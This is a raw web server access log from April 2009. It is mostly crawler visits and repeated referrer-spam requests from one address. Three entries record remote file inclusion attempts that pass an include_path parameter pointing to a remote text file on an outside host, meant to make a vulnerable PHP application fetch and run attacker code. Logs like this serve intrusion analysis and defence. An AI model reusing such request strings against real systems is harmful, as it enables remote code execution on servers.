94.178.0.170 - - [26/Apr/2009:18:02:19 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; es) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3" 499 1634
94.178.0.170 - - [26/Apr/2009:18:04:20 +0100] "GET / HTTP/1.1" 206 979 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 512 1345
220.181.61.234 - - [26/Apr/2009:19:04:48 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
69.84.207.147 - - [26/Apr/2009:19:35:23 +0100] "GET / HTTP/1.1" 206 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET CLR 3.0.04506.30)" 257 1672
77.221.130.18 - - [26/Apr/2009:21:03:50 +0100] "GET /?include_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 200 1266 "-" "Mozilla/5.0" 174 1587
77.221.130.18 - - [26/Apr/2009:21:03:50 +0100] "GET /log/?include_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 200 3184 "-" "Mozilla/5.0" 178 3418
77.221.130.18 - - [26/Apr/2009:21:03:50 +0100] "GET /log/web.log%20%20/?include_path=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 361 "-" "Mozilla/5.0" 192 607
94.178.0.170 - - [27/Apr/2009:02:17:21 +0100] "GET / HTTP/1.1" 206 871 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)" 506 1237
94.178.0.170 - - [27/Apr/2009:02:46:58 +0100] "GET / HTTP/1.1" 206 960 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)" 506 1326
124.115.0.160 - - [27/Apr/2009:03:01:26 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
94.178.0.170 - - [27/Apr/2009:03:08:21 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" 480 1634
94.178.0.170 - - [27/Apr/2009:03:10:38 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" 496 1634
94.178.0.170 - - [27/Apr/2009:03:11:25 +0100] "GET / HTTP/1.1" 206 999 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20070416 Firefox/1.5.0.4" 485 1365
94.178.0.170 - - [27/Apr/2009:03:12:17 +0100] "GET / HTTP/1.1" 206 1168 "http://ddpmall.com/Details-1yaself.html" "Opera/9.20 (Windows NT 5.1; U; en)" 438 1536
94.178.0.170 - - [27/Apr/2009:03:15:05 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 488 1634
